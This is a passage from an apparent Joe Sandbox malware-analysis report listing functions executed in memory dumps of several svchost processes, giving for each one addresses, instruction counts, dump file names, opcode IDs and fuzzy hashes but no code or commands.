                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c940db3ff7a9f5a09ac9241a9fbaf5c19709d06ebf5fc446a27751d51d34d52
                                                  • Instruction ID: 2be538587846df8c23b3e03620767413518c6e43bb0a395f49c20bc7292c9988
                                                  • Opcode Fuzzy Hash: 9c940db3ff7a9f5a09ac9241a9fbaf5c19709d06ebf5fc446a27751d51d34d52
                                                  • Instruction Fuzzy Hash: EB717A26B1896A8AD70ABB7CBC659ED7BA1EF86324B4845B7C008CB1D7CD246447C7C1
                                                  Function 00007FFD9B8B0705 Relevance: .3, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db206975792ea132c57f83f0b24a7e5609200afa31a11fd94b5f1056d4fbd7ad
                                                  • Instruction ID: 1158b68270e28ca2ab31c41e2253220cd5350d453e4f4774093e17c849f439b7
                                                  • Opcode Fuzzy Hash: db206975792ea132c57f83f0b24a7e5609200afa31a11fd94b5f1056d4fbd7ad
                                                  • Instruction Fuzzy Hash: B8817F62B1E9994FD309EB7C68754E97F60FF4530478840FBD0888B2EBDD246906CB81
                                                  Function 00007FFD9B8B0EEE Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aec0f1392dee7a29e57f0dcc65a7e9e6b15f9bbfbb6c2ffe6e5b366a2b5500b7
                                                  • Instruction ID: 9c693294cb6dba7482c9c7a403244e97b5d097d860c9b3e537568943a83c746d
                                                  • Opcode Fuzzy Hash: aec0f1392dee7a29e57f0dcc65a7e9e6b15f9bbfbb6c2ffe6e5b366a2b5500b7
                                                  • Instruction Fuzzy Hash: 24515721B0E69A0FE35AAB7C58369B53BD1DF86224B0940FBD08CC72EBDC0C58478752
                                                  Function 00007FFD9B8B0BF3 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bf119ba2ddb5fe881657c3f8f8a37f6df770eb92913e20469486785cb4b923e
                                                  • Instruction ID: 7a76357e05e3855ed1c1b1f78482b5e497a3ff26404c2e6d6f2b0f1c9f20c5dc
                                                  • Opcode Fuzzy Hash: 9bf119ba2ddb5fe881657c3f8f8a37f6df770eb92913e20469486785cb4b923e
                                                  • Instruction Fuzzy Hash: E4410621B19A5E4FEB49FBBC9865AED7BA1FF89300F844576D008C72C7CD24A446C791
                                                  Function 00007FFD9B8B0650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4dcf347052991d407725e81a3f1f4364e1717927752dddc4d5dfe70c8a21d3ae
                                                  • Instruction ID: 2dbcf1c10ed41471571010fb94b226c0a08ffe572de4762730001d991e53c3d3
                                                  • Opcode Fuzzy Hash: 4dcf347052991d407725e81a3f1f4364e1717927752dddc4d5dfe70c8a21d3ae
                                                  • Instruction Fuzzy Hash: A931D621B1C9480FE798EF6C586A679A7C2EF9D315F0401BAE00EC32EBDD18AC418741
                                                  Function 00007FFD9B8B0D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction ID: 84ed47f7e6a5dfff917c67434034cc3668c8211430212dbefee4a84cc2ce4442
                                                  • Opcode Fuzzy Hash: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction Fuzzy Hash: 55210752B1DA594FE759B7BC5C3A7B837D1EF98740F0402BAE00CC31D6EE1869428782
                                                  Function 00007FFD9B8B0870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d042ec6ddb2711ec65649d92f71e6fa040bdb0a86289761ded9d2969707c4925
                                                  • Instruction ID: 39bc9f95e37961edd51524f393e839e9a6c458690f3b7ed35b2dc71f5336347c
                                                  • Opcode Fuzzy Hash: d042ec6ddb2711ec65649d92f71e6fa040bdb0a86289761ded9d2969707c4925
                                                  • Instruction Fuzzy Hash: 1F317E65758A4A4FD348FB28A4BA9A9BF72FF88300BC484B5D419C73CEDD346942C752
                                                  Function 00007FFD9B8B2421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed921e3dccc8615ad4d8e0806d054525a37a787479d965a3f7294af325b0e25f
                                                  • Instruction ID: 9f7cd512e2d4146b3e3a4ecf36d8eaf0cdd69c78f1bd0dd2b6a6c12bcde48887
                                                  • Opcode Fuzzy Hash: ed921e3dccc8615ad4d8e0806d054525a37a787479d965a3f7294af325b0e25f
                                                  • Instruction Fuzzy Hash: D8017015A0E6A50FE755AB7C6C718757FE0DF9921070905BBE488C71E7D808664187C2
                                                  Function 00007FFD9B8B0E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction ID: 08c63b5c605943213cd53b8e428da500bde8beaddc7a743e666a5662f2767bd8
                                                  • Opcode Fuzzy Hash: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction Fuzzy Hash: B5E06D21B1491D4FEF44BBACA8556FCB2D2EB8C616F100177D51DD329ADE2898028381

                                                  Executed Functions

                                                  Function 00007FFD9B8A1779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d699d868665172c55e3b73ebe6ce0935cb0226502886f0435dd81805c9274867
                                                  • Instruction ID: 7f19b38fe0c47d7158d2711bbca7762459d5ea92b2c52cdf0077dc354d4a35c0
                                                  • Opcode Fuzzy Hash: d699d868665172c55e3b73ebe6ce0935cb0226502886f0435dd81805c9274867
                                                  • Instruction Fuzzy Hash: 7152B761F29A4D4FE768FB7898756B9B6D2FF9C700F4405B9E04EC32D6DE28A8018341
                                                  Function 00007FFD9B8A2259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a4aff629d3d025dbf7d80d81affff88a0266fdc345bba3951a804fb5757238f
                                                  • Instruction ID: 1aad4a02003e2454e3ced6f72f04aaf8f8005b4f42869100f10ee71eec2e7298
                                                  • Opcode Fuzzy Hash: 4a4aff629d3d025dbf7d80d81affff88a0266fdc345bba3951a804fb5757238f
                                                  • Instruction Fuzzy Hash: EF51FF10B0E6C90FD7A6ABB85835675BFE0DF9B219B0801FBE099C71E7DD081806C352
                                                  Function 00007FFD9B8A09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :M_^$k:M
                                                  • API String ID: 0-4016585720
                                                  • Opcode ID: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction ID: 002624ae95b24f00070e4224984cc128ce93d50c3f3842865c8409bf0b040c84
                                                  • Opcode Fuzzy Hash: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction Fuzzy Hash: 1801A75B7095A989D3077BADB8554ECBB90DE86339B0843F3D2C98D0839914508797C5
                                                  Function 00007FFD9B8A130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45ac22753057626c22a731b94effe56541927379bbae7f0cd77e201da3023663
                                                  • Instruction ID: 9a2fbb1d445897bff703a018f23f67c181ee0f13246993ab9f37dfd92a22868b
                                                  • Opcode Fuzzy Hash: 45ac22753057626c22a731b94effe56541927379bbae7f0cd77e201da3023663
                                                  • Instruction Fuzzy Hash: 9241E462F0A64E4FD755FBACE8750EC7BB1EF4A210B4402B7C059D71E2ED282802C350
                                                  Function 00007FFD9B8A0A68 Relevance: .3, Instructions: 279COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction ID: 1b942fa5ee171873e8579c65598d7a8563b345779fa4baa9cbc9e93a7ad423b3
                                                  • Opcode Fuzzy Hash: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction Fuzzy Hash: 9B716826B1996E8AD709BB7CBC256ED7BA0EF85324B4442B7D00DCB1C7DD24644683D0
                                                  Function 00007FFD9B8A0705 Relevance: .3, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction ID: 0940f870d55b9914233d07a66d7061904f2bc69c02174768cf0336a604369507
                                                  • Opcode Fuzzy Hash: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction Fuzzy Hash: 1B816862B0F9894FD319AB6C68754E8BF60EF4570474840FBD09D876DBED38A902C782
                                                  Function 00007FFD9B8A0EEE Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4255ebc052679ccfad6237d3ddad8fb67a80800062aea27d0b5111b1b36cf9d1
                                                  • Instruction ID: f15a490bc78117bc7a844b00e568749d6f61cb4920f15f58d762096df0b5747d
                                                  • Opcode Fuzzy Hash: 4255ebc052679ccfad6237d3ddad8fb67a80800062aea27d0b5111b1b36cf9d1
                                                  • Instruction Fuzzy Hash: 8E512621B1E6CA0FE35AA77C5866AB57BD1DF8622470940FBD49DC71EBDC0C58438352
                                                  Function 00007FFD9B8A0BF2 Relevance: .2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction ID: 81dd880c9c9ba983e97c13f20fb0900a8cdfffccee0ea40e3e4be977ab320ac6
                                                  • Opcode Fuzzy Hash: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction Fuzzy Hash: 6B413625B19A5D9FEB48FBAC98616EC7BE1FF88300F4445B6D009C72C7DE24A542C791
                                                  Function 00007FFD9B8A0650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d5eb824945b98e79ce251a28e81f712989309c5d7114df87c5b6002c901c1b7
                                                  • Instruction ID: c7f937d0c0b018b0cdf16f33e368551c5439c403d8bf62a826bf0ef1615a1c0b
                                                  • Opcode Fuzzy Hash: 3d5eb824945b98e79ce251a28e81f712989309c5d7114df87c5b6002c901c1b7
                                                  • Instruction Fuzzy Hash: 4131D621B1C94C0FE798EB6C586A679A7C2EF9D315F0405BAE01EC32EBDD58AC418341
                                                  Function 00007FFD9B8A0D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction ID: 73f409b1edb0e2a466ea2b8c30110559b8874984d12259c42338263cf9d35d62
                                                  • Opcode Fuzzy Hash: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction Fuzzy Hash: 4B21E152B19A494FE759A7B85C2A6B877D2EF98740F0403BAE00CC31D6EE1868428352
                                                  Function 00007FFD9B8A0870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73608d9baa2e452013353a7da419e2ea1c635fdd60c5668aacdf52589c7a23c3
                                                  • Instruction ID: e7422bd7fe5b272bb44246fd1f7f387cd57403971e02d04c3c411fee4ac4af61
                                                  • Opcode Fuzzy Hash: 73608d9baa2e452013353a7da419e2ea1c635fdd60c5668aacdf52589c7a23c3
                                                  • Instruction Fuzzy Hash: 0D319320B5A94D5FD35CEB2CA4B59A9BF71FF98200BC445A5D41AC33CAEE34A901C782
                                                  Function 00007FFD9B8A2421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1a06c98866065c0807cbf3400b3e9d6f5d84b074ba8915c3b31ade667a93670
                                                  • Instruction ID: df0925c1b9cd7e74510bb7bef2f63dcfe9b30f0498666194f39d162f62bd2a12
                                                  • Opcode Fuzzy Hash: c1a06c98866065c0807cbf3400b3e9d6f5d84b074ba8915c3b31ade667a93670
                                                  • Instruction Fuzzy Hash: CD017B14A0FB990FE365AB7858718357FF0DF99210B0905BBE8C8C71E7E908AA418392
                                                  Function 00007FFD9B8A0E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction ID: d4a1be4dbb91d95f671ba3bb4479e002fd0361fa0f5342f78bc72855bd9b8427
                                                  • Opcode Fuzzy Hash: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction Fuzzy Hash: B7E06D21B1490D4FEF44BBACA8557FCB2D2EB8C616F1002B7D51DC329ADE2858028391

                                                  Executed Functions

                                                  Function 00007FFD9B891779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 75118c7e8307a311198196d698784aaac9929b731c5732e9c340b4261f7800a2
                                                  • Instruction ID: 70ac4395c94ff26b4231448ada4a8f288030e576dd05776a8464dfd6ff7d1176
                                                  • Opcode Fuzzy Hash: 75118c7e8307a311198196d698784aaac9929b731c5732e9c340b4261f7800a2
                                                  • Instruction Fuzzy Hash: EA52B761F29A4D4FEB58FB7894796B9B7D2FF98300F4405B9E05EC32D6DE28A8418341
                                                  Function 00007FFD9B892259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e27d2e58240925144f319833d703014f35bd958de3e7566cccfe0b598e273609
                                                  • Instruction ID: 0450485bbe9b476e5765f011e92cae8e853b81e882f8cf2a69ec9eb0fb89d434
                                                  • Opcode Fuzzy Hash: e27d2e58240925144f319833d703014f35bd958de3e7566cccfe0b598e273609
                                                  • Instruction Fuzzy Hash: 1551FF10B1E6C90FDB9AABB85C75675AFE4DF9B219B1800FBE099C71E7DD085806C342
                                                  Function 00007FFD9B8909FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :N_^$k:N
                                                  • API String ID: 0-2639712577
                                                  • Opcode ID: d8ca2889e8383d71e8b687f87b7406e42c4a9a6c2a65eb1c8b64b90c7ecea697
                                                  • Instruction ID: a59a2332e6006ff3984178844b5b24263c72030cc69cb5ee4989a7f66ad8dd52
                                                  • Opcode Fuzzy Hash: d8ca2889e8383d71e8b687f87b7406e42c4a9a6c2a65eb1c8b64b90c7ecea697
                                                  • Instruction Fuzzy Hash: 9401F21BB086B18AD30777ADB8A45ECEB90CE8537AB0801B3C3C98E083941494C783C1
                                                  Function 00007FFD9B89130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34826285b6e34d6bc960ad48eac826ab67a90dfa03ed722585ea2f3a7231140e
                                                  • Instruction ID: 9ae26fd20f3126ddb8cfe8cc5841a53caf8388c1c7ee6d6427451e966f25aaf5
                                                  • Opcode Fuzzy Hash: 34826285b6e34d6bc960ad48eac826ab67a90dfa03ed722585ea2f3a7231140e
                                                  • Instruction Fuzzy Hash: 6041E532F0E65A5FDB55E7ACE8B51EC7FB1EF89250B4501B7D04ADB1A3ED2829068340
                                                  Function 00007FFD9B890A68 Relevance: .3, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54f84a82896707a90570d8e3d23890636bce25e75ebffd263e179067afa69a93
                                                  • Instruction ID: 7373c7b0de0b9fa29855b3d09c5cf65b402ede3e099a750a88925ceafa18f941
                                                  • Opcode Fuzzy Hash: 54f84a82896707a90570d8e3d23890636bce25e75ebffd263e179067afa69a93
                                                  • Instruction Fuzzy Hash: 75715B27B18A6A8BD709BB7CBC256ED7BA0EF85324B4445B7D149C71C7CD246446C3C0
                                                  Function 00007FFD9B890EEE Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c57daddbdcfb672bc28418a032b3a1026322dfb8c1266b4774b2ca4776966ff9
                                                  • Instruction ID: baeedd8cb4a13128a41a9bbdc266b540fbb146dcae2a104647e39c427ed22bbd
                                                  • Opcode Fuzzy Hash: c57daddbdcfb672bc28418a032b3a1026322dfb8c1266b4774b2ca4776966ff9
                                                  • Instruction Fuzzy Hash: B5514621B0E68A0FE75AA77C58769B57BD1DF8622470940FBD08DC71EBDC0C68478352
                                                  Function 00007FFD9B890BF3 Relevance: .2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0ca06e49bf851800b20d61027b887d4092bd24e7660325eb5edaeea3be7f2ac
                                                  • Instruction ID: 37d859910dc7f8ef2bbd183105cac66da64381fb6b8301c25bee2257a5b235f5
                                                  • Opcode Fuzzy Hash: f0ca06e49bf851800b20d61027b887d4092bd24e7660325eb5edaeea3be7f2ac
                                                  • Instruction Fuzzy Hash: C5412621B19A5D9FEB49FBAC98616EDBBE1FF88310F404476D008C72C7CE24A546C780
                                                  Function 00007FFD9B890650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d707126b8652584dd4e91d9a52918df61f13285fb630456f87c37e5468a1f150
                                                  • Instruction ID: 076be108fd942c2642aa326dc56b54a0fd3bbcfc42cbae624458c5347653d14a
                                                  • Opcode Fuzzy Hash: d707126b8652584dd4e91d9a52918df61f13285fb630456f87c37e5468a1f150
                                                  • Instruction Fuzzy Hash: 9731C821B1D9490FEB98EB6C587A679A7C2EF9C315F1405BEE41EC32EBDD18AC418341
                                                  Function 00007FFD9B890D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20e5d54e07ef3175a18f8c33e7f363fcdc670f176acb889d32fc013dd67261d1
                                                  • Instruction ID: 3505d6a634e58e5ce4e3805aae65d7d82f62f4196d251b0ed064a2dbd5b4a28f
